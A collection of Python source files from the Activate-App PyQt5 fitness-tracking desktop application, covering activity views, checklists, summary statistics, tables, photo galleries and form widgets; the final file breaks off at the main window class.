def switch_to_curve(self):
table, graph, self.fastest_indices = self.activity.track.get_curve(
self.good_distances
)
self.curve_chart.update([graph])
self.curve_table.update_data(list(self.good_distances.values()), table)
def update_page(self, page):
"""Switch to a new activity tab page."""
if page in self.updated:
return
(
self.switch_to_summary,
self.switch_to_data,
self.switch_to_splits,
self.switch_to_zones,
self.switch_to_curve,
)[page]()
self.updated.add(page)
def force_update_page(self, page):
"""Update a page even if it already appears up to date."""
if page in self.updated:
self.updated.remove(page)
self.update_page(page)
def show_activity(self, new_activity):
"""Display a new activity."""
self.activity = new_activity
self.setWindowTitle(f"Analysing {self.activity.name}")
if self.activity.track.manual:
self.activity_tabs.setCurrentIndex(0)
for page in range(1, 5):
self.activity_tabs.setTabEnabled(page, not self.activity.track.manual)
# Previously generated pages need refreshing
self.updated = set()
self.update_page(self.activity_tabs.currentIndex())
def show_map(self):
"""
Take back the map widget.
This is necessary because the map widget must be shared between
all layouts, and a widget cannot be in multiple places at once.
Call this when the activity view becomes visible.
"""
self.map_container.addWidget(self.map_widget)
def show_marker(self, values):
self.map_widget.remove_highlight()
distance = values.x()
self.charts.show_line(distance)
distance = self.unit_system.decode(distance, "distance")
point = self.activity.track.lat_lng_from_distance(distance)
self.map_widget.show_marker(point)
def show_split(self, split, _):
self.map_widget.remove_marker()
self.map_widget.show_highlight(
self.activity.track.part_lat_lon_list(
self.unit_system.decode(split, "distance"),
self.unit_system.decode(split + 1, "distance"),
)
)
def show_fastest(self, row, _):
self.curve_chart.set_vertical_line(
self.unit_system.encode(list(self.good_distances)[row], "distance")
)
self.map_widget.remove_marker()
section = self.fastest_indices[row]
self.map_widget.show_highlight(
self.activity.track.lat_lon_list[section[0] : section[1]]
)
def show_stat_point(self, stat, _):
stat = self.info_table.get_row_text(stat)[0]
self.map_widget.remove_highlight()
try:
stat = {"Max. Speed": "speed", "Highest Point": "ele"}[stat]
except KeyError:
self.map_widget.remove_marker()
return
point = self.activity.track.max_point(stat)
self.map_widget.show_marker(self.activity.track.lat_lon_list[point])
def closeEvent(self, *args, **kwargs):
self.closed.emit()
super().closeEvent(*args, **kwargs) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/activity_view.py | activity_view.py |
from __future__ import annotations
from typing import overload
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
Unchecked, PartiallyChecked, Checked = Qt.Unchecked, Qt.PartiallyChecked, Qt.Checked
class CheckList(QtWidgets.QListWidget):
"""A QListWidget with checkboxes on items."""
def __init__(self, *args, **kwargs):
self.do_not_recurse = False
self.all_row = False
super().__init__(*args, **kwargs)
self.itemChanged.connect(self.item_changed)
self.itemDoubleClicked.connect(self.item_double_clicked)
@overload
def __getitem__(self, index: int) -> QtWidgets.QListWidgetItem:
...
@overload
def __getitem__(self, index: slice) -> list[QtWidgets.QListWidgetItem]:
...
def __getitem__(self, index):
if isinstance(index, slice):
return [self.item(i) for i in range(len(self))[index]]
result = self.item(index)
if result is None:
raise IndexError(f"{self.__class__.__qualname__} index out of range")
return result
@property
def row_names(self):
return [row.text() for row in self]
@row_names.setter
def row_names(self, new_items):
self.clear()
self.addItems(new_items)
for row in self:
row.setCheckState(Unchecked)
@property
def states(self):
return {row.text(): row.checkState() for row in self}
@states.setter
def states(self, new_states):
for index, item in enumerate(self.row_names):
if item in new_states:
self.set_check_state(index, new_states[item])
@property
def num_states(self):
return {
row.text(): {Unchecked: 0, PartiallyChecked: 0.5, Checked: 1}[
row.checkState()
]
for row in self
}
@num_states.setter
def num_states(self, new_states):
for index, item in enumerate(self.row_names):
if item in new_states:
if new_states[item] == 0:
self.set_check_state(index, Unchecked)
elif new_states[item] == 0.5:
self.set_check_state(index, PartiallyChecked)
elif new_states[item] == 1:
self.set_check_state(index, Checked)
def get_row(self, row):
"""Get a row from a string, index or row."""
if isinstance(row, str):
for real_row in self:
if real_row.text() == row:
return real_row
raise ValueError(f"{row} is not a row.")
if isinstance(row, int):
return self[row]
return row
def set_check_state(self, row, state):
self.get_row(row).setCheckState(state)
def check_state(self, row):
return self.get_row(row).checkState()
@property
def checked_rows(self):
return [r.text() for r in self if r.checkState() == Checked]
def item_changed(self, item):
if self.do_not_recurse or not self.all_row:
return
self.stop_updates()
if self.is_all(item):
for item_ in self[1:]:
item_.setCheckState(item.checkState())
else:
states = {i.checkState() for i in self[1:]}
self.set_all_state(
next(iter(states)) if len(states) == 1 else PartiallyChecked
)
self.start_updates()
def item_double_clicked(self, item):
if self.is_all(item):
self.set_all_state(Checked)
return
self.stop_updates()
if self.all_row and len(self) > 2:
self.set_all_state(PartiallyChecked)
for item_ in self:
if not self.is_all(item_):
item_.setCheckState(Checked if item_ is item else Unchecked)
self.start_updates()
def check_all(self):
for row in self:
row.setCheckState(Checked)
def add_all_row(self):
self.insertItem(0, "All")
self.all_row = True
def is_all(self, item):
"""Check if a row is the 'All' row."""
return self.all_row and self.row(item) == 0
def set_all_state(self, state):
if self.all_row:
self.set_check_state(0, state)
def stop_updates(self):
self.do_not_recurse = True
self.blockSignals(True)
def start_updates(self):
self.do_not_recurse = False
self.blockSignals(False) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/checklist.py | checklist.py |
from collections import Counter
from datetime import datetime
from PyQt5 import QtWidgets
from activate import activity_types, number_formats
from activate.app import charts
from activate.app.dialogs import progress
from activate.app.ui.summary import Ui_summary
NOW = datetime.now()
class Summary(QtWidgets.QWidget, Ui_summary):
"""A widget summarising all of a person's activities."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setupUi(self)
def setup(self, unit_system, map_widget, activities):
self.unit_system = unit_system
self.map_widget = map_widget
self.activities = activities
# This has to be added here so when the heatmap is switched to,
# the widget is already 'there', so it has a size. This lets
# fitBounds work properly.
self.heatmap_layout.addWidget(self.map_widget)
self.records_table.set_units(self.unit_system)
self.summary_period = "Year"
self.progression_chart.set_units(self.unit_system)
self.update_activity_types_list()
self.eddington_chart = charts.LineChart(
self.eddington_chart_widget,
self.unit_system,
series_count=2,
vertical_log=True,
)
self.eddington_chart.y_axis.setTitleText("Count")
self.eddington_chart.add_legend(("Done", "Target"))
def update_activity_types_list(self):
"""Set up activity types list for the summary page."""
self.activity_types_list.row_names = [
x[0] for x in Counter(a.sport for a in self.activities).most_common()
]
self.activity_types_list.add_all_row()
self.activity_types_list.check_all()
def summary_tab_switch(self):
tab = self.summary_tabs.tabText(self.summary_tabs.currentIndex())
{
"Totals": self.update_totals,
"Records": self.update_records,
"Progression": self.update_progression,
"Gallery": self.update_gallery,
"Heatmap": self.update_heatmap,
"Eddington": self.update_eddington,
}[tab]()
def update_progression(self):
"""Update the progression chart."""
self.progression_chart.update(
self.summary_period,
self.get_allowed_for_summary(),
now=NOW,
activities=self.activities,
)
def get_allowed_for_summary(self):
"""Get the allowed activity types from the checklist."""
return set(self.activity_types_list.checked_rows)
def set_formatted_number_label(self, label, value, dimension):
"""Set a label to a number, formatted with the correct units."""
label.setText(
number_formats.default_as_string(self.unit_system.format(value, dimension))
)
def update_totals(self):
"""Update the summary page totals."""
allowed_activity_types = self.get_allowed_for_summary()
allowed_activities = list(
self.activities.filtered(allowed_activity_types, self.summary_period, NOW)
)
self.set_formatted_number_label(
self.total_distance_label,
self.activities.total_distance(allowed_activities),
"distance",
)
self.set_formatted_number_label(
self.total_time_label,
self.activities.total_time(allowed_activities),
"time",
)
self.total_activities_label.setText(
str(self.activities.total_activities(allowed_activities))
)
self.set_formatted_number_label(
self.total_climb_label,
self.activities.total_climb(allowed_activities),
"altitude",
)
def update_records(self):
good_distances = {}
for sport in self.get_allowed_for_summary():
good_distances.update(
activity_types.SPECIAL_DISTANCES[sport]
if sport in activity_types.SPECIAL_DISTANCES
else activity_types.SPECIAL_DISTANCES[None]
)
good_distances = {k: good_distances[k] for k in sorted(good_distances)}
records, activity_ids = self.activities.get_records(
self.get_allowed_for_summary(),
self.summary_period,
NOW,
good_distances,
lambda x: progress(self, list(x), "Loading"),
)
try:
first_non_one_second = max(
next(
i for i, r in enumerate(records) if r[1].value.total_seconds() > 1
),
1,
)
except StopIteration:
first_non_one_second = 0
records = records[first_non_one_second - 1 :]
activity_ids = list(activity_ids)[first_non_one_second - 1 :]
good_distances = list(good_distances.values())[first_non_one_second - 1 :]
self.records_table.update_data(good_distances, records, activity_ids)
def update_gallery(self):
self.gallery.replace_photos(
self.activities.get_all_photos(
self.get_allowed_for_summary(), self.summary_period, NOW
)
)
def update_heatmap(self):
self.heatmap_layout.addWidget(self.map_widget)
self.map_widget.show_heatmap(
self.activities.get_all_routes(
self.get_allowed_for_summary(),
self.summary_period,
NOW,
lambda x: progress(self, list(x), "Loading"),
)
)
def update_eddington(self):
allowed_activities = list(
self.activities.filtered(
self.get_allowed_for_summary(), self.summary_period, NOW
)
)
if not allowed_activities:
return
unit = self.unit_system.units["distance"].size
eddington_data = self.activities.eddington(
allowed_activities, lambda x: progress(self, list(x), "Loading")
)
eddington_number = 0
for eddington_number in range(1, len(eddington_data) + 1):
if eddington_data[eddington_number - 1] <= eddington_number * unit:
break
self.total_eddington_label.setText(
f"{eddington_number} {self.unit_system.units['distance'].symbol}"
)
y_indices = list(range(1, len(eddington_data) + 1))
x_indices = [x * unit for x in y_indices[: int(eddington_data[0] / unit) + 1]]
y_indices = (y_indices, None)
self.eddington_chart.update(
(
((eddington_data, "distance"), y_indices),
((x_indices, "distance"), y_indices),
)
)
def summary_period_changed(self, value):
self.summary_period = value
self.summary_tab_switch() | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/summary.py | summary.py |
import dataclasses
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon
from activate import number_formats, times, units
from activate.app import connect
def aligned(horizontal="c", vertical="c"):
"""
Get a Qt Alignment from a string.
The first argument gives the horizontal alignment:
Left, Centre, Right or Justified.
The second argument gives the vertical alignment:
Bottom, Centre, Top or bAseline.
"""
return {
"l": Qt.AlignLeft,
"c": Qt.AlignHCenter,
"r": Qt.AlignRight,
"v": Qt.AlignJustify,
}[horizontal.casefold()] | {
"b": Qt.AlignBottom,
"c": Qt.AlignVCenter,
"t": Qt.AlignTop,
"a": Qt.AlignBaseline,
}[
vertical.casefold()
]
def iterablise(obj):
"""If obj is not already iterable, form an endless iterator of it."""
try:
iter(obj)
return obj
except TypeError:
# Infinite iterator
return iter(lambda: obj, object())
def create_table_item(
item, format_function=None, unit_system=None, align=None
) -> QtWidgets.QTableWidgetItem:
"""
Create a table item that can be a FormattableNumber.
If item is a tuple, will return a table item that looks like item[1]
but sorts with item[0]. Otherwise just returns a normal table item.
"""
if isinstance(item, units.DimensionValue):
item = item.encode(unit_system)
if format_function is not None:
widget = FormattableNumber(item, format_function(item))
widget.setTextAlignment(aligned("r"))
# Format as string
else:
widget = QtWidgets.QTableWidgetItem(str(item))
if align is not None:
widget.setTextAlignment(align)
return widget
def good_minus(string):
"""Replace an initial hyphen-minuses with a real minus sign."""
if string and string[0] == "-":
return "\u2212" + string[1:]
return string
class FormattableNumber(QtWidgets.QTableWidgetItem):
"""A sortable, formatted number to place in a table."""
def __init__(self, number, text):
super().__init__(good_minus(text))
self.number = number
def __lt__(self, other):
return self.number < other.number
class Table(QtWidgets.QTableWidget):
unit_system = None
def resize_to_contents(self, direction="h"):
"""
Set a header to auto-resize its items.
This also stops the user resizing them, which is good because
usually resizing these things is not particularly useful.
"""
if direction == "h":
header = self.horizontalHeader()
elif direction == "v":
header = self.verticalHeader()
else:
raise ValueError(f"Invalid direction: {direction}. (Must be 'h' or 'v')")
header.setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)
def set_item(self, row, column, value, format_function=None, align=None):
self.setItem(
row,
column,
create_table_item(value, format_function, self.unit_system, align=align),
)
def set_row(self, values, position, formats=None, alignments=None):
alignments = iterablise(alignments)
formats = iterablise(formats)
for column, (value, format_, align) in enumerate(
zip(values, formats, alignments)
):
self.set_item(position, column, value, format_, align)
def get_row_text(self, index) -> list:
result = []
for column in range(self.columnCount()):
item = self.item(index, column)
result.append(None if item is None else item.text())
return result
@property
def headings(self):
return [self.get_heading(i) for i in range(self.columnCount())]
def get_heading(self, index) -> str:
return self.horizontalHeaderItem(index).text()
class ValueColumnTable(QtWidgets.QTableWidget):
def set_units(self, unit_system):
self.unit_system = unit_system
def resize_to_contents(self, vertical=False):
if vertical:
header = self.verticalHeader()
else:
header = self.horizontalHeader()
header.setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents)
def define_columns(self, names, dimensions, format_functions=None, alignments=None):
self.setColumnCount(len(names))
self.setHorizontalHeaderLabels(
[
self.unit_system.format_name_unit(
name, self.unit_system.units[dimension].symbol
)
for name, dimension in zip(names, dimensions)
]
)
if format_functions is None:
self.format_functions = [None for _ in names]
else:
self.format_functions = format_functions
if alignments is None:
self.alignments = [None for _ in names]
else:
self.alignments = alignments
def set_item(self, row, column, value):
self.setItem(
row,
column,
create_table_item(
value,
self.format_functions[column],
self.unit_system,
self.alignments[column],
),
)
def set_row(self, values, position):
for column, value in enumerate(values):
self.set_item(position, column, value)
def __len__(self):
return self.rowCount()
class SplitTable(ValueColumnTable):
headings = ["Number", "Time", "Split", "Speed", "Net Climb", "Ascent"]
dimensions = [None, "time", "time", "speed", "altitude", "altitude"]
def set_units(self, *args, **kwargs):
super().set_units(*args, **kwargs)
self.define_columns(
self.headings,
self.dimensions,
[number_formats.split_format(h) for h in self.headings],
alignments=[aligned("r") for _ in self.headings],
)
self.resize_to_contents()
def update_data(self, data):
self.setRowCount(len(data))
for y, row in enumerate(data):
row_data = [y + 1] + row
self.set_row(row_data, y)
class ActivityListTable(ValueColumnTable):
headings = ["Name", "Type", "Start Time", "Distance"]
dimensions = [None, None, None, "distance"]
right_clicked = QtCore.pyqtSignal(QtCore.QEvent)
def set_units(self, *args, **kwargs):
super().set_units(*args, **kwargs)
self.define_columns(
self.headings,
self.dimensions,
[number_formats.list_format(h) for h in self.headings],
)
self.resize_to_contents()
self.resize_to_contents(vertical=True)
self.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)
@property
def current_activity_id(self):
return self.selectedItems()[0].activity_id
def set_id_row(self, activity_id, values, position):
"""
Set the items in the given activity list row to specific values.
Assigns activity_id to the item in column zero in the new_row.
"""
self.set_row(values, position)
self.item(position, 0).activity_id = activity_id
def add_id_row(self, activity_id, values, position):
sorting_was_enabled = self.isSortingEnabled()
self.setSortingEnabled(False)
self.insertRow(position)
self.set_id_row(activity_id, values, position)
if sorting_was_enabled:
self.setSortingEnabled(True)
def default_sort(self):
self.setSortingEnabled(True)
self.sortItems(self.headings.index("Start Time"), Qt.DescendingOrder)
def mouseReleaseEvent(self, event):
if event.button() == Qt.RightButton:
self.right_clicked.emit(event)
else:
super().mouseReleaseEvent(event)
def select(self, activity_id):
for row in range(len(self)):
if self.item(row, 0).activity_id == activity_id:
self.selectRow(row)
return
def filter(self, ids):
for row in range(len(self)):
self.setRowHidden(row, self.item(row, 0).activity_id not in ids)
class SocialActivityList(ActivityListTable):
headings = ["Server", "User", "Name", "Type", "Start Time", "Distance"]
dimensions = [None, None, None, None, None, "distance"]
def filter_by_server(self, allowed):
for row in range(len(self)):
servers = self.item(row, 0).text().split("\n")
usernames = self.item(row, 1).text().split("\n")
self.setRowHidden(
row, not any(x in allowed for x in zip(servers, usernames))
)
class CurveTable(ValueColumnTable):
headings = ["Distance", "Time", "Speed"]
dimensions = [None, "time", "speed"]
def set_units(self, *args, **kwargs):
super().set_units(*args, **kwargs)
self.define_columns(
self.headings,
self.dimensions,
[lambda x: x, times.to_string, lambda x: str(round(x, 1))],
)
def update_data(self, good_distance_names, table):
self.setRowCount(len(table))
for index, row in enumerate(table):
self.set_row(good_distance_names[index : index + 1] + list(row[1:]), index)
class RecordsTable(CurveTable):
headings = CurveTable.headings + ["Activity"]
dimensions = CurveTable.dimensions + [None]
# An int results in an overflow issue
gone_to = QtCore.pyqtSignal(object)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.itemDoubleClicked.connect(self.go_to)
def set_units(self, *args, **kwargs):
super().set_units(*args, **kwargs)
self.define_columns(
self.headings,
self.dimensions,
[lambda x: x, times.to_string, lambda x: str(round(x, 1)), lambda x: x],
)
self.resize_to_contents()
def update_data(self, good_distance_names, table, activity_ids):
super().update_data(good_distance_names, table)
for row, activity_id in enumerate(activity_ids):
self.item(row, self.headings.index("Activity")).activity_id = activity_id
def go_to(self, item):
if self.headings[item.column()] == "Activity":
self.gone_to.emit(item.activity_id)
class InfoTable(Table):
"""
The table widget on the right.
This is used for distance, climb, duration etc.
"""
def set_units(self, unit_system):
self.unit_system = unit_system
def update_data(self, info: dict):
self.setRowCount(len(info))
for row, (field, value) in enumerate(info.items()):
self.set_item(row, 0, field)
self.set_item(
row, 1, value, number_formats.info_format(field), align=aligned("r")
)
self.set_item(
row,
2,
self.unit_system.units[value.dimension].symbol,
align=aligned("l"),
)
class ServersTable(Table):
headings = ["Address", "Name", "Username", "Password"]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Set up right click delete menu
self.menu = QtWidgets.QMenu(self)
self.action_delete = QtWidgets.QAction("Delete")
self.action_delete.setIcon(QIcon.fromTheme("edit-delete"))
self.menu.addAction(self.action_delete)
def set_columns(self):
self.setColumnCount(len(self.headings))
self.setHorizontalHeaderLabels(self.headings)
def set_server(self, row, server):
self.set_row(["" if x is None else x for x in dataclasses.astuple(server)], row)
def set_servers(self, servers):
self.setRowCount(len(servers))
self.set_columns()
for row, server in enumerate(servers):
self.set_server(row, server)
def get_servers(self):
return [connect.Server(*self.get_row_text(r)) for r in range(self.rowCount())]
def add_row(self):
self.setRowCount(self.rowCount() + 1)
self.set_columns()
def contextMenuEvent(self, event):
"""Open a context menu to remove a server."""
if self.menu.exec(event.globalPos()):
self.removeRow(self.row(self.itemAt(event.pos()))) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/tables.py | tables.py |
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import Qt
from activate.app import paths
class ClickablePhoto(QtWidgets.QLabel):
"""
A photo that can be clicked.
It may also have a right-click menu for deleting itself.
"""
clicked = QtCore.pyqtSignal(int)
deleted = QtCore.pyqtSignal(int)
def __init__(self, *args, deletable=False, **kwargs):
super().__init__(*args, **kwargs)
self.menu = QtWidgets.QMenu(self)
self._index = None
if deletable:
self.action_delete = QtWidgets.QAction("Delete")
self.action_delete.setIcon(QtGui.QIcon.fromTheme("edit-delete"))
self.action_delete.triggered.connect(self.delete)
self.menu.addAction(self.action_delete)
@property
def index(self):
if self._index is None:
return self.parent().layout().indexOf(self)
return self._index
@index.setter
def index(self, value):
self._index = value
def mouseReleaseEvent(self, event):
if event.button() == Qt.LeftButton:
self.clicked.emit(self.index)
super().mousePressEvent(event)
def contextMenuEvent(self, event):
self.menu.exec(event.globalPos())
def delete(self):
self.deleted.emit(self.index)
class Gallery(QtWidgets.QWidget):
"""A multi-row container for photos."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setLayout = QtWidgets.QVBoxLayout(self)
def resizeEvent(self, event):
super().resizeEvent(event)
self.width = event.size().width()
self.height = event.size().height()
def empty(self):
"""Remove all photos in the PhotoList."""
for index in range(self.layout().count() - 1, -1, -1):
self.layout().itemAt(index).widget().setParent(None)
def replace_photos(self, filenames):
"""Replace the photos with new ones."""
self.filenames = filenames
self.empty()
row_height = 120
self.photos = [
QtGui.QPixmap(str(f)).scaledToHeight(row_height, Qt.SmoothTransformation)
for f in filenames
]
row = QtWidgets.QWidget(self)
row.setLayout(QtWidgets.QHBoxLayout(row))
width = self.space(row, 0)
for index, photo in enumerate(self.photos):
next_photo_width = photo.width()
width += next_photo_width + row.layout().spacing()
if width > self.width:
self.layout().addWidget(row)
row = QtWidgets.QWidget(self)
row.setLayout(QtWidgets.QHBoxLayout(row))
width = self.space(row, 1) + next_photo_width
photo = self.create_label(photo)
photo.index = index
row.layout().addWidget(photo)
self.layout().addWidget(row)
def create_label(self, photo):
label = ClickablePhoto(self, deletable=False)
label.setPixmap(photo)
label.clicked.connect(self.show_photos)
return label
def space(self, row, photo_count):
"""Get the required empty space for photo_count photos in row."""
return (
row.layout().spacing() * (photo_count - 1)
+ self.layout().contentsMargins().left()
+ self.layout().contentsMargins().right()
+ row.layout().contentsMargins().left()
+ row.layout().contentsMargins().right()
)
def show_photos(self, index):
"""Open the photo viewer on a photo."""
viewer = PhotoViewer(self.filenames, index)
viewer.exec()
class PhotoList(QtWidgets.QWidget):
"""A container for photos."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setLayout = QtWidgets.QHBoxLayout(self)
def resizeEvent(self, event):
super().resizeEvent(event)
self.width = event.size().width()
self.height = event.size().height()
def empty(self):
"""Remove all photos in the PhotoList."""
for index in range(self.layout().count() - 1, -1, -1):
self.layout().itemAt(index).widget().setParent(None)
def replace_photos(self, filenames):
"""Replace the photos with new ones."""
self.empty()
self.filenames = filenames
if not filenames:
return
self.photos = [QtGui.QPixmap(str(f)) for f in filenames]
total_aspect = sum(i.width() / i.height() for i in self.photos)
total_aspect = max(total_aspect, 2)
width = self.width - self.space(len(self.photos))
height = width / total_aspect
self.photos = [
p.scaledToHeight(height, Qt.SmoothTransformation) for p in self.photos
]
self.labels = []
for photo in self.photos:
self.add_photo(photo)
def add_photo(self, photo):
"""Add a new photo to the list."""
label = ClickablePhoto(self, deletable=True)
label.setPixmap(photo)
label.deleted.connect(self.delete)
label.clicked.connect(self.show_photos)
self.layout().addWidget(label)
self.labels.append(label)
def space(self, photo_count):
"""Get the required empty space for photo_count photos."""
return (
self.layout().spacing() * (photo_count - 1)
+ self.layout().contentsMargins().left()
+ self.layout().contentsMargins().right()
)
def show_photos(self, index):
"""Open the photo viewer on a photo."""
viewer = PhotoViewer(self.filenames, index)
viewer.exec()
def show_activity_photos(self, activity):
"""Update to showing a new activity's photos."""
self.activity = activity
self.replace_photos(activity.photos)
def delete(self, index):
"""Remove a photo from an activity."""
self.filenames.pop(index)
self.photos.pop(index)
self.replace_photos(self.filenames)
self.activity.photos = self.filenames
self.activity.save(paths.ACTIVITIES)
class PhotoViewer(QtWidgets.QDialog):
def __init__(self, photos, current_index, *args, **kwargs):
self.filenames = photos.copy()
self.current_index = current_index
self.photos = photos
super().__init__(*args, **kwargs)
self.label = QtWidgets.QLabel(self)
self.main_layout = QtWidgets.QHBoxLayout(self)
self.main_layout.setContentsMargins(0, 0, 0, 0)
self.main_layout.addWidget(self.label, alignment=Qt.AlignCenter)
self.show_photo()
def show_photo(self):
"""Display a new photo.."""
photo = self.photos[self.current_index]
if not isinstance(photo, QtGui.QPixmap):
photo = QtGui.QPixmap(str(photo))
photo = photo.scaled(
self.width(), self.height(), Qt.KeepAspectRatio, Qt.SmoothTransformation
)
self.photos[self.current_index] = photo
self.label.setPixmap(photo)
def set_new_index(self, index):
"""Handle left and right keypresses."""
self.current_index = index
self.current_index %= len(self.photos)
self.show_photo()
def keyPressEvent(self, event):
if event.key() in {Qt.Key_Right, Qt.Key_Space}:
self.set_new_index(self.current_index + 1)
return
if event.key() in {Qt.Key_Left, Qt.Key_Backspace}:
self.set_new_index(self.current_index - 1)
return
super().keyPressEvent(event)
def resizeEvent(self, event):
super().resizeEvent(event)
self.photos = self.filenames.copy()
self.show_photo() | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/photos.py | photos.py |
import collections
from datetime import timedelta
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from activate import activity_types, times
from activate import units as units_
from activate.app import checklist
UNIVERSAL_FLAGS = ("Commute", "Indoor")
TYPE_FLAGS = collections.defaultdict(tuple)
TYPE_FLAGS.update(activity_types.FLAGS)
EFFORT_LEVELS = (
"None",
"Very easy",
"Easy",
"Quite easy",
"Moderate",
"Quite hard",
"Hard",
"Very hard",
"Extreme",
"Maximum",
)
class ActivityFlagEdit(checklist.CheckList):
def change_options(self, activity_type):
self.row_names = TYPE_FLAGS[activity_type] + UNIVERSAL_FLAGS
class DurationEdit(QtWidgets.QFormLayout):
"""A widget to allow editing an hours minute seconds duration."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.hours_widget = QtWidgets.QSpinBox()
self.addRow("Hours", self.hours_widget)
self.minutes_widget = QtWidgets.QSpinBox()
self.minutes_widget.setRange(0, 59)
self.addRow("Minutes", self.minutes_widget)
self.seconds_widget = QtWidgets.QDoubleSpinBox()
self.seconds_widget.setRange(0, 59.99)
self.addRow("Seconds", self.seconds_widget)
def value(self):
return timedelta(
hours=self.hours_widget.value(),
minutes=self.minutes_widget.value(),
seconds=self.seconds_widget.value(),
)
def set_value(self, new: timedelta):
hours, minutes, seconds = times.hours_minutes_seconds(new)
self.hours_widget.setValue(hours)
self.minutes_widget.setValue(minutes)
self.seconds_widget.setValue(seconds)
class EffortEdit(QtWidgets.QVBoxLayout):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.slider = QtWidgets.QSlider(Qt.Horizontal, self.parent())
self.slider.setMaximum(9)
self.slider.valueChanged.connect(self.set_label)
self.slider.sliderPressed.connect(self.set_label)
self.addWidget(self.slider)
self.label = QtWidgets.QLabel("Unspecified")
self.addWidget(self.label)
def set_label(self):
self.label.setText(EFFORT_LEVELS[self.slider.value()])
def value(self):
if self.label.text() == "Unspecified":
return None
return self.slider.value()
def set_value(self, value):
if value is None:
self.slider.setValue(0)
self.label.setText("Unspecified")
else:
self.slider.setValue(value)
WIDGET_VALUES = {
QtWidgets.QLineEdit: lambda w: w.text(),
QtWidgets.QPlainTextEdit: lambda w: w.toPlainText(),
QtWidgets.QTextEdit: lambda w: w.text(),
QtWidgets.QSpinBox: lambda w: w.value(),
QtWidgets.QDoubleSpinBox: lambda w: w.value(),
QtWidgets.QComboBox: lambda w: w.currentText(),
QtWidgets.QTimeEdit: lambda w: w.time().toPyTime(),
QtWidgets.QDateTimeEdit: lambda w: w.dateTime().toPyDateTime(),
QtWidgets.QDateEdit: lambda w: w.date().toPyDate(),
QtWidgets.QAbstractSlider: lambda w: w.value(),
QtWidgets.QKeySequenceEdit: lambda w: w.keySequence(),
checklist.CheckList: lambda w: w.num_states,
DurationEdit: lambda w: w.value(),
EffortEdit: lambda w: w.value(),
}
WIDGET_SETTERS = {
QtWidgets.QLineEdit: lambda w, v: w.setText(v),
QtWidgets.QPlainTextEdit: lambda w, v: w.setPlainText(v),
QtWidgets.QTextEdit: lambda w, v: w.setText(v),
QtWidgets.QSpinBox: lambda w, v: w.setValue(v),
QtWidgets.QDoubleSpinBox: lambda w, v: w.setValue(v),
QtWidgets.QComboBox: lambda w, v: w.setCurrentText(v),
QtWidgets.QTimeEdit: lambda w, v: w.setTime(v),
QtWidgets.QDateTimeEdit: lambda w, v: w.setDateTime(v),
QtWidgets.QDateEdit: lambda w, v: w.setDate(v),
QtWidgets.QAbstractSlider: lambda w, v: w.setValue(v),
QtWidgets.QKeySequenceEdit: lambda w, v: w.setKeySequence(v),
checklist.CheckList: lambda w, v: setattr(w, "num_states", v),
DurationEdit: lambda w, v: w.set_value(v),
EffortEdit: lambda w, v: w.set_value(v),
}
def get_value(widget):
for widget_type, function in WIDGET_VALUES.items():
if isinstance(widget, widget_type):
return function(widget)
def set_value(widget, value):
for widget_type, function in WIDGET_SETTERS.items():
if isinstance(widget, widget_type):
return function(widget, value)
class Form(QtWidgets.QFormLayout):
def __init__(self, fields, *args, **kwargs):
self.fields = fields
super().__init__(*args, **kwargs)
for (name, entry) in self.fields.items():
self.addRow(name, entry)
def values(self):
return {
name: get_value(
self.itemAt(index, self.FieldRole).widget()
or self.itemAt(index, self.FieldRole).layout()
)
for index, name in enumerate(self.fields.keys())
}
def set_values(self, values):
for index, name in enumerate(self.fields.keys()):
if name in values:
set_value(
self.itemAt(index, self.FieldRole).widget()
or self.itemAt(index, self.FieldRole).layout(),
values[name],
)
class CustomUnits(QtWidgets.QFormLayout):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.combo_boxes = {}
self.labels = list(units_.ALL.keys())
for unit, options in units_.ALL.items():
if len(options) <= 1:
continue
combo_box = QtWidgets.QComboBox()
combo_box.addItem("Default")
for option in options:
combo_box.addItem(option.name.capitalize())
self.addRow(unit.replace("_", " ").title(), combo_box)
self.combo_boxes[unit] = combo_box
def units_dict(self):
result = {}
for unit in self.combo_boxes:
value = self.combo_boxes[unit].currentText()
if value == "Default":
continue
result[unit] = value.casefold()
return result
def set_units(self, units):
for unit, value in units.items():
self.combo_boxes[unit].setCurrentIndex(
self.combo_boxes[unit].findText(value.capitalize())
) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/app/widgets.py | widgets.py |
import sys
import time
from contextlib import suppress
from pathlib import Path
import pkg_resources
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon, QPixmap
import activate.app.dialogs
import activate.app.dialogs.activity
import activate.app.dialogs.settings
from activate import (
activity,
activity_list,
files,
filetypes,
load_activity,
serialise,
track,
units,
)
from activate.app import activity_view, connect, maps, paths, settings, sync, widgets
from activate.app.ui.main import Ui_main_window
SYNC_PROGRESS_STEPS = 1000
SYNC_WAIT_DIVISIONS = 100
SYNC_DELAY = 2
GET_TICKS = round(0.3 * SYNC_WAIT_DIVISIONS)
ADD_TICKS = round(0.05 * SYNC_WAIT_DIVISIONS)
def get_unsynced_edited():
try:
return set(serialise.load(paths.UNSYNCED_EDITED))
except FileNotFoundError:
return set()
def save_unsynced_edited(data):
serialise.dump(list(data), paths.UNSYNCED_EDITED)
class MainWindow(QtWidgets.QMainWindow, Ui_main_window):
